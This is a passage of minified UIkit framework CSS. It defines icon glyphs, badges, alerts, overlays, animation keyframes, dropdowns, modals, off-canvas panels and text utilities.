}.uk-icon-shopping-basket:before{content:"\f291"}.uk-icon-stop-circle:before{content:"\f28d"}.uk-icon-stop-circle-o:before{content:"\f28e"}.uk-icon-usb:before{content:"\f287"}.uk-icon-american-sign-language-interpreting:before,.uk-icon-asl-interpreting:before{content:"\f2a3"}.uk-icon-assistive-listening-systems:before{content:"\f2a2"}.uk-icon-audio-description:before{content:"\f29e"}.uk-icon-blind:before{content:"\f29d"}.uk-icon-braille:before{content:"\f2a1"}.uk-icon-deaf:before,.uk-icon-deafness:before{content:"\f2a4"}.uk-icon-envira:before{content:"\f299"}.uk-icon-fa:before,.uk-icon-font-awesome:before{content:"\f2b4"}.uk-icon-first-order:before{content:"\f2b0"}.uk-icon-gitlab:before{content:"\f296"}.uk-icon-glide:before{content:"\f2a5"}.uk-icon-glide-g:before{content:"\f2a6"}.uk-icon-hard-of-hearing:before{content:"\f2a4"}.uk-icon-low-vision:before{content:"\f2a8"}.uk-icon-question-circle-o:before{content:"\f29c"}.uk-icon-sign-language:before,.uk-icon-signing:before{content:"\f2a7"}.uk-icon-snapchat:before{content:"\f2ab"}.uk-icon-snapchat-ghost:before{content:"\f2ac"}.uk-icon-snapchat-square:before{content:"\f2ad"}.uk-icon-themeisle:before{content:"\f2b2"}.uk-icon-universal-access:before{content:"\f29a"}.uk-icon-viadeo:before{content:"\f2a9"}.uk-icon-viadeo-square:before{content:"\f2aa"}.uk-icon-volume-control-phone:before{content:"\f2a0"}.uk-icon-wheelchair-alt:before{content:"\f29b"}.uk-icon-wpbeginner:before{content:"\f297"}.uk-icon-wpforms:before{content:"\f298"}.uk-icon-yoast:before{content:"\f2b1"}.uk-icon-adress-book:before{content:"\f2b9"}.uk-icon-adress-book-o:before{content:"\f2ba"}.uk-icon-adress-card:before{content:"\f2bb"}.uk-icon-adress-card-o:before{content:"\f2bc"}.uk-icon-bandcamp:before{content:"\f2d5"}.uk-icon-bath:before,.uk-icon-bathub:before{content:"\f2cd"}.uk-icon-drivers-license:before{content:"\f2c2"}.uk-icon-drivers-license-o:before{content:"\f2c3"}.uk-icon-eercast:before{content:"\f2da"}.uk-icon-envelope-open:before{content:"\f2b6"}.uk-icon-envelope-open-o:before{content:"\f2b7"}.uk-icon-etsy:before{content:"\f2d7"}.uk-icon-free-code-camp:before{content:"\f2c5"}.uk-icon-grav:before{content:"\f2d6"}.uk-icon-handshake-o:before{content:"\f2b5"}.uk-icon-id-badge:before{content:"\f2c1"}.uk-icon-id-card:before{content:"\f2c2"}.uk-icon-id-card-o:before{content:"\f2c3"}.uk-icon-imdb:before{content:"\f2d8"}.uk-icon-linode:before{content:"\f2b8"}.uk-icon-meetup:before{content:"\f2e0"}.uk-icon-microchip:before{content:"\f2db"}.uk-icon-podcast:before{content:"\f2ce"}.uk-icon-quora:before{content:"\f2c4"}.uk-icon-ravelry:before{content:"\f2d9"}.uk-icon-s15:before{content:"\f2cd"}.uk-icon-shower:before{content:"\f2cc"}.uk-icon-snowflake-o:before{content:"\f2dc"}.uk-icon-superpowers:before{content:"\f2dd"}.uk-icon-telegram:before{content:"\f2c6"}.uk-icon-thermometer:before{content:"\f2c7"}.uk-icon-thermometer-0:before{content:"\f2cb"}.uk-icon-thermometer-1:before{content:"\f2ca"}.uk-icon-thermometer-2:before{content:"\f2c9"}.uk-icon-thermometer-3:before{content:"\f2c8"}.uk-icon-thermometer-4:before{content:"\f2c7"}.uk-icon-thermometer-empty:before{content:"\f2cb"}.uk-icon-thermometer-full:before{content:"\f2c7"}.uk-icon-thermometer-half:before{content:"\f2c9"}.uk-icon-thermometer-quarter:before{content:"\f2ca"}.uk-icon-thermometer-three-quarters:before{content:"\f2c8"}.uk-icon-times-rectangle:before{content:"\f2d3"}.uk-icon-times-rectangle-o:before{content:"\f2d4"}.uk-icon-user-circle:before{content:"\f2bd"}.uk-icon-user-circle-o:before{content:"\f2be"}.uk-icon-user-o:before{content:"\f2c0"}.uk-icon-vcard:before{content:"\f2bb"}.uk-icon-vcard-o:before{content:"\f2bc"}.uk-icon-widow-close:before{content:"\f2d3"}.uk-icon-widow-close-o:before{content:"\f2d4"}.uk-icon-window-maximize:before{content:"\f2d0"}.uk-icon-window-minimize:before{content:"\f2d1"}.uk-icon-window-restore:before{content:"\f2d2"}.uk-icon-wpexplorer:before{content:"\f2de"}.uk-close::-moz-focus-inner{border:0;padding:0}.uk-close{margin:0;border:none;font:inherit;color:inherit;padding:0;background:0 0;box-sizing:content-box;width:20px;line-height:20px;opacity:.3}.uk-badge-notification,.uk-container,.uk-modal-dialog,.uk-overlay-area-content,.uk-responsive-height,.uk-responsive-width,.uk-scrollable-box,.uk-thumbnail,[class*=uk-height]{box-sizing:border-box}.uk-close:after{display:block;content:"\f00d";font-family:FontAwesome}.uk-close:focus,.uk-close:hover{opacity:.5;outline:0;color:inherit;text-decoration:none;cursor:pointer}.uk-badge,a.uk-badge:hover{color:#fff}.uk-close-alt{padding:2px;border-radius:50%;background:#fff;opacity:1;box-shadow:0 0 0 1px rgba(0,0,0,.1),0 0 6px rgba(0,0,0,.3)}.uk-close-alt:focus,.uk-close-alt:hover{opacity:1}.uk-close-alt:after{opacity:.5}.uk-close-alt:focus:after,.uk-close-alt:hover:after{opacity:.8}.uk-badge{display:inline-block;padding:0 5px;background:#00a8e6;font-size:10px;font-weight:700;line-height:14px;text-align:center;text-transform:none;border:1px solid rgba(0,0,0,.06);border-radius:2px;text-shadow:0 1px 0 rgba(0,0,0,.1)}.uk-badge-notification{min-width:18px;border-radius:500px;font-size:12px;line-height:18px}.uk-badge-success{background-color:#8cc14c}.uk-badge-warning{background-color:#faa732}.uk-badge-danger{background-color:#da314b}.uk-alert{margin-bottom:15px;padding:10px;background:#ebf7fd;color:#2d7091;border:1px solid rgba(45,112,145,.3);border-radius:4px;text-shadow:0 1px 0 #fff}*+.uk-alert{margin-top:15px}.uk-alert>:last-child{margin-bottom:0}.uk-alert h1,.uk-alert h2,.uk-alert h3,.uk-alert h4,.uk-alert h5,.uk-alert h6{color:inherit}.uk-alert>.uk-close:first-child{float:right}.uk-alert>.uk-close:first-child+*{margin-top:0}.uk-alert-success{background:#f2fae3;color:#659f13;border-color:rgba(101,159,19,.3)}.uk-alert-warning{background:#fffceb;color:#e28327;border-color:rgba(226,131,39,.3)}.uk-alert-danger{background:#fff1f0;color:#d85030;border-color:rgba(216,80,48,.3)}.uk-alert-large{padding:20px}.uk-alert-large>.uk-close:first-child{margin:-10px -10px 0 0}.uk-overlay,.uk-thumbnail{margin:0;display:inline-block;max-width:100%}.uk-overlay-area-content>:last-child,.uk-overlay-panel.uk-flex>*>:last-child,.uk-overlay-panel>:last-child,.uk-overlay>:first-child{margin-bottom:0}.uk-thumbnail{padding:4px;border:1px solid #ddd;background:#fff;border-radius:4px}a.uk-thumbnail:focus,a.uk-thumbnail:hover{border-color:#aaa;background-color:#fff;text-decoration:none;outline:0}.uk-thumbnail-caption{padding-top:4px;text-align:center;color:#444}.uk-thumbnail-mini{width:150px}.uk-thumbnail-small{width:200px}.uk-thumbnail-medium{width:300px}.uk-thumbnail-large{width:400px}.uk-thumbnail-expand,.uk-thumbnail-expand>img{width:100%}.uk-overlay{overflow:hidden;-webkit-transform:translateZ(0)}.uk-overlay-area:empty:before,.uk-overlay-icon:before{content:"\f002";width:50px;height:50px;margin-top:-25px;margin-left:-25px;font-size:50px;line-height:1;text-align:center;font-family:FontAwesome}.uk-overlay.uk-border-circle{-webkit-mask-image:-webkit-radial-gradient(circle,#fff 100%,#000 100%)}.uk-overlay-panel{position:absolute;top:0;bottom:0;left:0;right:0;padding:20px;color:#fff}.uk-overlay-panel a[class*=uk-icon-]:not(.uk-icon-button),.uk-overlay-panel h1,.uk-overlay-panel h2,.uk-overlay-panel h3,.uk-overlay-panel h4,.uk-overlay-panel h5,.uk-overlay-panel h6{color:inherit}.uk-overlay-panel a:not([class]){color:inherit;text-decoration:underline}.uk-overlay-active :not(.uk-active)>.uk-overlay-panel:not(.uk-ignore),.uk-overlay-hover:not(:hover):not(.uk-hover) .uk-overlay-panel:not(.uk-ignore){opacity:0}.uk-overlay-background{background:rgba(0,0,0,.5)}.uk-overlay-image{padding:0}.uk-overlay-top{bottom:auto}.uk-overlay-bottom{top:auto}.uk-overlay-left{right:auto}.uk-overlay-right{left:auto}.uk-overlay-icon:before{position:absolute;top:50%;left:50%;color:#fff}.uk-overlay-blur,.uk-overlay-fade,.uk-overlay-grayscale,.uk-overlay-scale,.uk-overlay-spin,[class*=uk-overlay-slide]{transition-duration:.3s;transition-timing-function:ease-out;transition-property:opacity,transform,filter}.uk-overlay-active .uk-overlay-fade,.uk-overlay-active .uk-overlay-scale,.uk-overlay-active .uk-overlay-spin,.uk-overlay-active [class*=uk-overlay-slide]{transition-duration:.8s}.uk-overlay-fade{opacity:.7}.uk-overlay-active .uk-active>.uk-overlay-fade,.uk-overlay-hover.uk-hover .uk-overlay-fade,.uk-overlay-hover:hover .uk-overlay-fade{opacity:1}.uk-overlay-scale{-webkit-transform:scale(1);transform:scale(1)}.uk-overlay-active .uk-active>.uk-overlay-scale,.uk-overlay-hover.uk-hover .uk-overlay-scale,.uk-overlay-hover:hover .uk-overlay-scale{-webkit-transform:scale(1.1);transform:scale(1.1)}.uk-overlay-spin{-webkit-transform:scale(1) rotate(0);transform:scale(1) rotate(0)}.uk-overlay-active .uk-active>.uk-overlay-spin,.uk-overlay-hover.uk-hover .uk-overlay-spin,.uk-overlay-hover:hover .uk-overlay-spin{-webkit-transform:scale(1.1) rotate(3deg);transform:scale(1.1) rotate(3deg)}.uk-overlay-grayscale{-webkit-filter:grayscale(100%);filter:grayscale(100%)}.uk-overlay-active .uk-active>.uk-overlay-grayscale,.uk-overlay-hover.uk-hover .uk-overlay-grayscale,.uk-overlay-hover:hover .uk-overlay-grayscale{-webkit-filter:grayscale(0);filter:grayscale(0)}[class*=uk-overlay-slide]{opacity:0}.uk-overlay-slide-top{-webkit-transform:translateY(-100%);transform:translateY(-100%)}.uk-overlay-slide-bottom{-webkit-transform:translateY(100%);transform:translateY(100%)}.uk-overlay-slide-left{-webkit-transform:translateX(-100%);transform:translateX(-100%)}.uk-overlay-slide-right{-webkit-transform:translateX(100%);transform:translateX(100%)}.uk-overlay-active .uk-active>[class*=uk-overlay-slide],.uk-overlay-hover.uk-hover [class*=uk-overlay-slide],.uk-overlay-hover:hover [class*=uk-overlay-slide]{opacity:1;-webkit-transform:translateX(0) translateY(0);transform:translateX(0) translateY(0)}.uk-overlay-area,.uk-overlay-caption{-webkit-transition:opacity .15s linear;-webkit-transform:translate3d(0,0,0);position:absolute;right:0;bottom:0}.uk-overlay-area{top:0;left:0;background:rgba(0,0,0,.3);opacity:0;transition:opacity .15s linear}.uk-overlay-toggle.uk-hover .uk-overlay-area,.uk-overlay-toggle:hover .uk-overlay-area,.uk-overlay.uk-hover .uk-overlay-area,.uk-overlay:hover .uk-overlay-area{opacity:1}.uk-overlay-area:empty:before{position:absolute;top:50%;left:50%;color:#fff}.uk-overlay-area:not(:empty){font-size:0}.uk-overlay-area:not(:empty):before{content:'';display:inline-block;height:100%;vertical-align:middle}.uk-overlay-area-content{display:inline-block;width:100%;font-size:1rem;text-align:center;padding:0 15px;color:#fff}.uk-overlay-area-content a:not([class]),.uk-overlay-area-content a:not([class]):hover{color:inherit}.uk-overlay-caption{left:0;padding:15px;background:rgba(0,0,0,.5);color:#fff;opacity:0;transition:opacity .15s linear}.uk-overlay-toggle.uk-hover .uk-overlay-caption,.uk-overlay-toggle:hover .uk-overlay-caption,.uk-overlay.uk-hover .uk-overlay-caption,.uk-overlay:hover .uk-overlay-caption{opacity:1}[class*=uk-column-]{-webkit-column-gap:25px;-moz-column-gap:25px;column-gap:25px}.uk-column-1-2{-webkit-column-count:2;-moz-column-count:2;column-count:2}.uk-column-1-3{-webkit-column-count:3;-moz-column-count:3;column-count:3}.uk-column-1-4{-webkit-column-count:4;-moz-column-count:4;column-count:4}.uk-column-1-5{-webkit-column-count:5;-moz-column-count:5;column-count:5}.uk-column-1-6{-webkit-column-count:6;-moz-column-count:6;column-count:6}@media (min-width:480px){.uk-column-small-1-2{-webkit-column-count:2;-moz-column-count:2;column-count:2}.uk-column-small-1-3{-webkit-column-count:3;-moz-column-count:3;column-count:3}.uk-column-small-1-4{-webkit-column-count:4;-moz-column-count:4;column-count:4}.uk-column-small-1-5{-webkit-column-count:5;-moz-column-count:5;column-count:5}.uk-column-small-1-6{-webkit-column-count:6;-moz-column-count:6;column-count:6}}@media (min-width:768px){.uk-column-medium-1-2{-webkit-column-count:2;-moz-column-count:2;column-count:2}.uk-column-medium-1-3{-webkit-column-count:3;-moz-column-count:3;column-count:3}.uk-column-medium-1-4{-webkit-column-count:4;-moz-column-count:4;column-count:4}.uk-column-medium-1-5{-webkit-column-count:5;-moz-column-count:5;column-count:5}.uk-column-medium-1-6{-webkit-column-count:6;-moz-column-count:6;column-count:6}}@media (min-width:960px){.uk-column-large-1-2{-webkit-column-count:2;-moz-column-count:2;column-count:2}.uk-column-large-1-3{-webkit-column-count:3;-moz-column-count:3;column-count:3}.uk-column-large-1-4{-webkit-column-count:4;-moz-column-count:4;column-count:4}.uk-column-large-1-5{-webkit-column-count:5;-moz-column-count:5;column-count:5}.uk-column-large-1-6{-webkit-column-count:6;-moz-column-count:6;column-count:6}}[class*=uk-animation-]{-webkit-animation-duration:.5s;animation-duration:.5s;-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out;-webkit-animation-fill-mode:both;animation-fill-mode:both}@media screen{[data-uk-scrollspy*=uk-animation-]:not([data-uk-scrollspy*=target]){opacity:0}}.uk-animation-fade{-webkit-animation-name:uk-fade;animation-name:uk-fade;-webkit-animation-duration:.8s;animation-duration:.8s;-webkit-animation-timing-function:linear!important;animation-timing-function:linear!important}.uk-animation-scale-up{-webkit-animation-name:uk-fade-scale-02;animation-name:uk-fade-scale-02}.uk-animation-scale-down{-webkit-animation-name:uk-fade-scale-18;animation-name:uk-fade-scale-18}.uk-animation-slide-top{-webkit-animation-name:uk-fade-top;animation-name:uk-fade-top}.uk-animation-slide-bottom{-webkit-animation-name:uk-fade-bottom;animation-name:uk-fade-bottom}.uk-animation-slide-left{-webkit-animation-name:uk-fade-left;animation-name:uk-fade-left}.uk-animation-slide-right{-webkit-animation-name:uk-fade-right;animation-name:uk-fade-right}.uk-animation-scale{-webkit-animation-name:uk-scale-12;animation-name:uk-scale-12}.uk-animation-shake{-webkit-animation-name:uk-shake;animation-name:uk-shake}.uk-animation-reverse{-webkit-animation-direction:reverse;animation-direction:reverse;-webkit-animation-timing-function:ease-in;animation-timing-function:ease-in}.uk-animation-15{-webkit-animation-duration:15s;animation-duration:15s}.uk-animation-top-left{-webkit-transform-origin:0 0;transform-origin:0 0}.uk-animation-top-center{-webkit-transform-origin:50% 0;transform-origin:50% 0}.uk-animation-top-right{-webkit-transform-origin:100% 0;transform-origin:100% 0}.uk-animation-middle-left{-webkit-transform-origin:0 50%;transform-origin:0 50%}.uk-animation-middle-right{-webkit-transform-origin:100% 50%;transform-origin:100% 50%}.uk-animation-bottom-left{-webkit-transform-origin:0 100%;transform-origin:0 100%}.uk-animation-bottom-center{-webkit-transform-origin:50% 100%;transform-origin:50% 100%}.uk-animation-bottom-right{-webkit-transform-origin:100% 100%;transform-origin:100% 100%}.uk-animation-hover:not(:hover),.uk-animation-hover:not(:hover) [class*=uk-animation-],.uk-touch .uk-animation-hover:not(.uk-hover),.uk-touch .uk-animation-hover:not(.uk-hover) [class*=uk-animation-]{-webkit-animation-name:none;animation-name:none}@-webkit-keyframes uk-fade{0%{opacity:0}100%{opacity:1}}@keyframes uk-fade{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes uk-fade-top{0%{opacity:0;-webkit-transform:translateY(-100%)}100%{opacity:1;-webkit-transform:translateY(0)}}@keyframes uk-fade-top{0%{opacity:0;transform:translateY(-100%)}100%{opacity:1;transform:translateY(0)}}@-webkit-keyframes uk-fade-bottom{0%{opacity:0;-webkit-transform:translateY(100%)}100%{opacity:1;-webkit-transform:translateY(0)}}@keyframes uk-fade-bottom{0%{opacity:0;transform:translateY(100%)}100%{opacity:1;transform:translateY(0)}}@-webkit-keyframes uk-fade-left{0%{opacity:0;-webkit-transform:translateX(-100%)}100%{opacity:1;-webkit-transform:translateX(0)}}@keyframes uk-fade-left{0%{opacity:0;transform:translateX(-100%)}100%{opacity:1;transform:translateX(0)}}@-webkit-keyframes uk-fade-right{0%{opacity:0;-webkit-transform:translateX(100%)}100%{opacity:1;-webkit-transform:translateX(0)}}@keyframes uk-fade-right{0%{opacity:0;transform:translateX(100%)}100%{opacity:1;transform:translateX(0)}}@-webkit-keyframes uk-fade-scale-02{0%{opacity:0;-webkit-transform:scale(.2)}100%{opacity:1;-webkit-transform:scale(1)}}@keyframes uk-fade-scale-02{0%{opacity:0;transform:scale(.2)}100%{opacity:1;transform:scale(1)}}@-webkit-keyframes uk-fade-scale-15{0%{opacity:0;-webkit-transform:scale(1.5)}100%{opacity:1;-webkit-transform:scale(1)}}@keyframes uk-fade-scale-15{0%{opacity:0;transform:scale(1.5)}100%{opacity:1;transform:scale(1)}}@-webkit-keyframes uk-fade-scale-18{0%{opacity:0;-webkit-transform:scale(1.8)}100%{opacity:1;-webkit-transform:scale(1)}}@keyframes uk-fade-scale-18{0%{opacity:0;transform:scale(1.8)}100%{opacity:1;transform:scale(1)}}@-webkit-keyframes uk-slide-left{0%{-webkit-transform:translateX(-100%)}100%{-webkit-transform:translateX(0)}}@keyframes uk-slide-left{0%{transform:translateX(-100%)}100%{transform:translateX(0)}}@-webkit-keyframes uk-slide-right{0%{-webkit-transform:translateX(100%)}100%{-webkit-transform:translateX(0)}}@keyframes uk-slide-right{0%{transform:translateX(100%)}100%{transform:translateX(0)}}@-webkit-keyframes uk-slide-left-33{0%{-webkit-transform:translateX(33%)}100%{-webkit-transform:translateX(0)}}@keyframes uk-slide-left-33{0%{transform:translateX(33%)}100%{transform:translateX(0)}}@-webkit-keyframes uk-slide-right-33{0%{-webkit-transform:translateX(-33%)}100%{-webkit-transform:translateX(0)}}@keyframes uk-slide-right-33{0%{transform:translateX(-33%)}100%{transform:translateX(0)}}@-webkit-keyframes uk-scale-12{0%{-webkit-transform:scale(1.2)}100%{-webkit-transform:scale(1)}}@keyframes uk-scale-12{0%{transform:scale(1.2)}100%{transform:scale(1)}}@-webkit-keyframes uk-rotate{0%{-webkit-transform:rotate(0)}100%{-webkit-transform:rotate(359deg)}}@keyframes uk-rotate{0%{transform:rotate(0)}100%{transform:rotate(359deg)}}@-webkit-keyframes uk-shake{0%,100%{-webkit-transform:translateX(0)}10%{-webkit-transform:translateX(-9px)}20%{-webkit-transform:translateX(8px)}30%{-webkit-transform:translateX(-7px)}40%{-webkit-transform:translateX(6px)}50%{-webkit-transform:translateX(-5px)}60%{-webkit-transform:translateX(4px)}70%{-webkit-transform:translateX(-3px)}80%{-webkit-transform:translateX(2px)}90%{-webkit-transform:translateX(-1px)}}@keyframes uk-shake{0%,100%{transform:translateX(0)}10%{transform:translateX(-9px)}20%{transform:translateX(8px)}30%{transform:translateX(-7px)}40%{transform:translateX(6px)}50%{transform:translateX(-5px)}60%{transform:translateX(4px)}70%{transform:translateX(-3px)}80%{transform:translateX(2px)}90%{transform:translateX(-1px)}}@-webkit-keyframes uk-slide-top-fixed{0%{opacity:0;-webkit-transform:translateY(-10px)}100%{opacity:1;-webkit-transform:translateY(0)}}@keyframes uk-slide-top-fixed{0%{opacity:0;transform:translateY(-10px)}100%{opacity:1;transform:translateY(0)}}@-webkit-keyframes uk-slide-bottom-fixed{0%{opacity:0;-webkit-transform:translateY(10px)}100%{opacity:1;-webkit-transform:translateY(0)}}@keyframes uk-slide-bottom-fixed{0%{opacity:0;transform:translateY(10px)}100%{opacity:1;transform:translateY(0)}}.uk-dropdown,.uk-dropdown-blank{display:none;position:absolute;z-index:1020;box-sizing:border-box;width:200px}.uk-dropdown{padding:15px;background:#fff;color:#444;font-size:1rem;vertical-align:top;border:1px solid #ddd;border-radius:4px}.uk-dropdown:focus{outline:0}.uk-open>.uk-dropdown,.uk-open>.uk-dropdown-blank{display:block;-webkit-animation:uk-fade .2s ease-in-out;animation:uk-fade .2s ease-in-out;-webkit-transform-origin:0 0;transform-origin:0 0}.uk-dropdown-top{margin-top:-5px}.uk-dropdown-bottom{margin-top:5px}.uk-dropdown-left{margin-left:-5px}.uk-dropdown-right{margin-left:5px}.uk-dropdown .uk-nav{margin:0 -15px}.uk-dropdown-grid>[class*=uk-width-]>.uk-panel+.uk-panel,.uk-dropdown-stack>.uk-dropdown-grid>[class*=uk-width-]:nth-child(n+2),.uk-grid .uk-dropdown-grid+.uk-dropdown-grid{margin-top:15px}@media (min-width:768px){.uk-dropdown:not(.uk-dropdown-stack)>.uk-dropdown-grid{margin-left:-15px;margin-right:-15px}.uk-dropdown:not(.uk-dropdown-stack)>.uk-dropdown-grid>[class*=uk-width-]{padding-left:15px;padding-right:15px}.uk-dropdown:not(.uk-dropdown-stack)>.uk-dropdown-grid>[class*=uk-width-]:nth-child(n+2){border-left:1px solid #ddd}.uk-dropdown-width-2:not(.uk-dropdown-stack){width:400px}.uk-dropdown-width-3:not(.uk-dropdown-stack){width:600px}.uk-dropdown-width-4:not(.uk-dropdown-stack){width:800px}.uk-dropdown-width-5:not(.uk-dropdown-stack){width:1000px}}@media (max-width:767px){.uk-dropdown-grid>[class*=uk-width-]{width:100%}.uk-dropdown-grid>[class*=uk-width-]:nth-child(n+2){margin-top:15px}}.uk-dropdown-stack>.uk-dropdown-grid>[class*=uk-width-]{width:100%}.uk-dropdown-small{min-width:150px;width:auto;padding:5px;white-space:nowrap}.uk-dropdown-small .uk-nav{margin:0 -5px}.uk-dropdown-navbar{margin-top:6px;background:#fff;color:#444;left:-1px}.uk-open>.uk-dropdown-navbar{-webkit-animation:uk-slide-top-fixed .2s ease-in-out;animation:uk-slide-top-fixed .2s ease-in-out}.uk-dropdown-scrollable{overflow-y:auto;max-height:200px}.uk-dropdown-navbar.uk-dropdown-flip{left:auto}.uk-modal{display:none;position:fixed;top:0;right:0;bottom:0;left:0;z-index:1010;overflow-y:auto;-webkit-overflow-scrolling:touch;background:rgba(0,0,0,.6);opacity:0;-webkit-transition:opacity .15s linear;transition:opacity .15s linear;touch-action:cross-slide-y pinch-zoom double-tap-zoom;-webkit-transform:translateZ(0);transform:translateZ(0)}.uk-modal.uk-open{opacity:1}.uk-modal-page,.uk-modal-page body{overflow:hidden}.uk-modal-dialog{position:relative;margin:50px auto;padding:20px;width:600px;max-width:100%;max-width:calc(100% - 20px);background:#fff;opacity:0;-webkit-transform:translateY(-100px);transform:translateY(-100px);-webkit-transition:opacity .3s linear,-webkit-transform .3s ease-out;transition:opacity .3s linear,transform .3s ease-out;border-radius:4px;box-shadow:0 0 10px rgba(0,0,0,.3)}@media (max-width:767px){.uk-modal-dialog{width:auto;margin:10px auto}}.uk-open .uk-modal-dialog{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}.uk-modal-dialog>:not([class*=uk-modal-]):last-child{margin-bottom:0}.uk-modal-dialog>.uk-close:first-child{margin:-10px -10px 0 0;float:right}.uk-modal-dialog>.uk-close:first-child+:not([class*=uk-modal-]){margin-top:0}.uk-modal-dialog-lightbox{margin:15px auto;padding:0;max-width:95%;max-width:calc(100% - 30px);min-height:50px;border-radius:0}.uk-modal-dialog-lightbox>.uk-close:first-child{position:absolute;top:-12px;right:-12px;margin:0;float:none}@media (max-width:767px){.uk-modal-dialog-lightbox>.uk-close:first-child{top:-7px;right:-7px}}.uk-modal-dialog-blank{margin:0;padding:0;width:100%;max-width:100%;-webkit-transition:opacity .3s linear;transition:opacity .3s linear}.uk-modal-dialog-blank>.uk-close:first-child{position:absolute;top:20px;right:20px;z-index:1;margin:0;float:none}@media (min-width:768px){.uk-modal-dialog-large{width:930px}}@media (min-width:1220px){.uk-column-xlarge-1-2{-webkit-column-count:2;-moz-column-count:2;column-count:2}.uk-column-xlarge-1-3{-webkit-column-count:3;-moz-column-count:3;column-count:3}.uk-column-xlarge-1-4{-webkit-column-count:4;-moz-column-count:4;column-count:4}.uk-column-xlarge-1-5{-webkit-column-count:5;-moz-column-count:5;column-count:5}.uk-column-xlarge-1-6{-webkit-column-count:6;-moz-column-count:6;column-count:6}.uk-modal-dialog-large{width:1130px}}.uk-modal-header{margin:-20px -20px 15px;padding:20px;border-bottom:1px solid #ddd;border-radius:4px 4px 0 0;background:#fafafa}.uk-modal-footer{margin:15px -20px -20px;padding:20px;border-top:1px solid #ddd;border-radius:0 0 4px 4px;background:#fafafa}.uk-modal-footer>:last-child,.uk-modal-header>:last-child{margin-bottom:0}.uk-modal-caption{position:absolute;left:0;right:0;bottom:-20px;margin-bottom:-10px;color:#fff;text-align:center;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.uk-modal-spinner{position:absolute;top:50%;left:50%;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%);font-size:25px;color:#ddd}.uk-offcanvas,.uk-offcanvas-bar{position:fixed;left:0;top:0;bottom:0}.uk-modal-spinner:after{content:"\f110";display:block;font-family:FontAwesome;-webkit-animation:uk-rotate 2s infinite linear;animation:uk-rotate 2s infinite linear}.uk-clearfix:after,.uk-clearfix:before,.uk-container:after,.uk-container:before,.uk-offcanvas-bar:after{content:""}.uk-offcanvas{display:none;right:0;z-index:1000;touch-action:none;background:rgba(0,0,0,.1)}.uk-offcanvas.uk-active{display:block}.uk-offcanvas-page{position:fixed;-webkit-transition:margin-left .3s ease-in-out;transition:margin-left .3s ease-in-out;margin-left:0}.uk-offcanvas-bar{-webkit-transform:translateX(-100%);transform:translateX(-100%);z-index:1001;width:270px;max-width:100%;background:#333;overflow-y:auto;-webkit-overflow-scrolling:touch;-webkit-transition:-webkit-transform .3s ease-in-out;transition:transform .3s ease-in-out;-ms-scroll-chaining:none}.uk-offcanvas-bar-flip:after,.uk-offcanvas-bar:after{width:1px;background:rgba(0,0,0,.6);box-shadow:0 0 5px 2px rgba(0,0,0,.6)}.uk-offcanvas.uk-active .uk-offcanvas-bar.uk-offcanvas-bar-show{-webkit-transform:translateX(0);transform:translateX(0)}.uk-offcanvas-bar-flip{left:auto;right:0;-webkit-transform:translateX(100%);transform:translateX(100%)}.uk-offcanvas-bar[mode=none]{-webkit-transition:none;transition:none}.uk-offcanvas-bar[mode=reveal]{-webkit-transform:translateX(0);transform:translateX(0);clip:rect(0,0,100vh,0);-webkit-transition:-webkit-transform .3s ease-in-out,clip .3s ease-in-out;transition:transform .3s ease-in-out,clip .3s ease-in-out}.uk-offcanvas-bar-flip[mode=reveal]{clip:none;-webkit-transform:translateX(100%);transform:translateX(100%)}.uk-offcanvas-bar-flip[mode=reveal]>*{-webkit-transform:translateX(-100%);transform:translateX(-100%);-webkit-transition:-webkit-transform .3s ease-in-out;transition:transform .3s ease-in-out}.uk-offcanvas.uk-active .uk-offcanvas-bar-flip[mode=reveal].uk-offcanvas-bar-show>*{-webkit-transform:translateX(0);transform:translateX(0)}.uk-offcanvas .uk-panel{margin:20px 15px;color:#777;text-shadow:0 1px 0 rgba(0,0,0,.5)}.uk-offcanvas .uk-panel a:not([class]),.uk-offcanvas .uk-panel-title{color:#ccc}.uk-offcanvas .uk-panel a:not([class]):hover{color:#fff}.uk-offcanvas-bar:after{display:block;position:absolute;top:0;bottom:0;right:0}.uk-offcanvas-bar-flip:after{right:auto;left:0}.uk-switcher{margin:0;padding:0;touch-action:cross-slide-y pinch-zoom double-tap-zoom}.uk-switcher>:not(.uk-active){display:none}.uk-text-small{font-size:11px;line-height:16px}.uk-text-large{font-size:18px;line-height:24px;font-weight:400}.uk-text-bold{font-weight:700}.uk-text-muted{color:#999!important}.uk-text-primary{color:#2d7091!important}.uk-text-success{color:#659f13!important}.uk-text-warning{color:#e28327!important}.uk-text-danger{color:#d85030!important}.uk-text-contrast{color:#fff!important}.uk-text-left{text-align:left!important}.uk-text-right{text-align:right!important}.uk-text-center{text-align:center!important}.uk-text-justify{text-align:justify!important}.uk-text-top{vertical-align:top!important}.uk-text-middle{vertical-align:middle!important}.uk-text-bottom{vertical-align:bottom!important}@media (max-width:959px){.uk-text-center-medium{text-align:center!important}.uk-text-left-medium{text-align:left!important}}.uk-text-nowrap{white-space:nowrap}.uk-text-truncate{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.uk-text-break{word-wrap:break-word;-webkit-hyphens:auto;-ms-hyphens:auto;-moz-hyphens:auto;hyphens:auto}.uk-text-capitalize{text-transform:capitalize!important}.uk-text-lowercase{text-transform:lowercase!important}.uk-text-uppercase{text-transform:uppercase!important}.uk-container{max-width:980px;padding:0 25px}@media (min-width:1220px){.uk-container{max-width:1200px;padding:0 35px}}.uk-container:after,.uk-container:before{display:table}.uk-container-center{margin-left:auto;margin-right:auto}.uk-clearfix:before{display:table-cell}.uk-clearfix:after{display:table}.uk-nbfc{overflow:hidden}.uk-nbfc-alt{display:table-cell;width:10000px}.uk-float-left{float:left}.uk-float-right{float:right}[class*=uk-float-]{max-width:100%}[class*=uk-align-]{display:block;margin-bottom:15px}.uk-align-left{margin-right:15px;float:left}.uk-align-right{margin-left:15px;float:right}@media 